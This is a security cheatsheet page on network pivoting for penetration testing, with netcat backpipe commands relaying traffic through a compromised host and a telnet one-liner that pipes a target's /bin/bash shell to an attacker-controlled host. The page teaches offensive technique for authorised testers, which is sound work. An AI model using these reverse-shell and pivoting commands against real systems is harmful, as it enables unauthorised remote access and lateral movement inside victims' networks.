Reduce Production Outages

Self-Hosted AI Code Reviewer

Hexmos LiveReview AI-Powered Code Review
Live Review
AI-Powered Code Review

Pivoting Techniques - Network Security Tools

Explore essential pivoting techniques for network penetration testing. Learn to use backpipes and Telnet for advanced pivoting with our comprehensive guide.

Pivoting Techniques

Pivoting is a crucial technique in network penetration testing, allowing an attacker to gain access to internal network segments from an already compromised system. This section details common methods for achieving pivoting, focusing on backpipes and Telnet variants.

Understanding Pivoting

Pivoting involves using an intermediate compromised host to access other systems or networks that are not directly reachable from the attacker's initial point of compromise. This is essential for lateral movement within a target network.

Pivoting with Backpipes

Backpipes, often implemented using tools like netcat (nc), are a powerful way to establish command execution and data exfiltration channels. They allow for the redirection of standard input and output between processes and network connections.

Creating a FIFO for Backpipes

Before establishing a backpipe, a named pipe (FIFO - First-In, First-Out) is often created in the file system. This pipe acts as a buffer between the input and output streams.

# To make a FIFO in the file system
mknod [name of file] p
Backpipe with Netcat

This setup involves listening on one port on the attacker machine and forwarding traffic through the pivot host to another internal service.

# On the attacker machine:
# Listen on a port to receive shell from pivot
nc -l -n -v -p 4444 

# On the pivot host:
# Create a FIFO, then pipe netcat input/output through it
nc localhost 80 <[FIFO file name] | nc -l -p 4444 >[FIFO file name]
Telnet Variant for Pivoting

When netcat is not available on the target or pivot host, Telnet can sometimes be used as an alternative, though it is less secure due to its unencrypted nature.

Setting up Telnet Listeners

Multiple Telnet listeners are set up on the attacker machine to receive different streams of data.

# Listen on port 80 in terminal 1 on the attack machine
nc -l -n -v -p 80 

# Listen on port 443 in terminal 2 on the attack machine
nc -l -n -v -p 443
Executing the Telnet Command on the Target

The target machine initiates connections to the attacker's listeners, piping its shell through Telnet.

# On the target machine:
telnet [attack host] 80 | /bin/bash | telnet [attack host] 443
External Resources
← Back to security cheatsheets All cheatsheets 🙏  Credits & Acknowledgments